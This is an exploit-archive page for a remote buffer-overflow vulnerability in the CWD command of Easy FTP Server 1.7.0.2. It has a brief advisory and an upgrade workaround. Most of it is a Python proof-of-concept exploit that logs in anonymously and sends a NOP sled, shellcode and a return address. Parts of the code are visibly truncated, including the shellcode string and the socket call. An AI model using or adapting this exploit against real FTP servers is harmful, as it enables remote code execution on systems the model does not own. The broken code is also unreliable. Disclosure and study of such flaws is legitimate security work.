10.46.20 Easy FTP Server 1.7.0.2 Remote BoF | |
| * Other vulnerabilities covered in bid:38262 * === Infos === Credit: loneferret Found: 18/02/10 Versions affected <= 1.7.0.2 === Description === Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker. === Workaround === Upgrade to the latest version - 1.7.0.12 === PoC === #!/usr/bin/python import socket, sys print """ ****************************** * Easy FTP Server 1.7.0.2 Remote BoF * * Discovered by: Jon Butler * * jonbutler88[at]googlemail[dot] ****************************** """ if len(sys.argv) != 3: print "Usage: ./easyftp.py <Target IP> <Port>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) # Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng) shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\ "\x33\xC0\x50\x68\x63\x61\x6C\ "\xC7\x93\xC2\x77" "\xFF\xD1\xEB\xF7") nopsled = "\x90" * (268 - len(shellcode)) ret = "\x58\xFD\x9A\x00" payload = nopsled + shellcode + ret # 272 bytes print "[+] Launching exploit against " + target + "..." s=socket.socket(socket.AF_ try: connect=s.connect((target, port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) # Send payload... print "[+] Sending payload..." s.send('CWD ' + payload + '\r\n') try: s.recv(1024) print "[!] Exploit failed..." except: print "[+] Exploited ^_^" | |
|
| |
| Total comments: 0 | |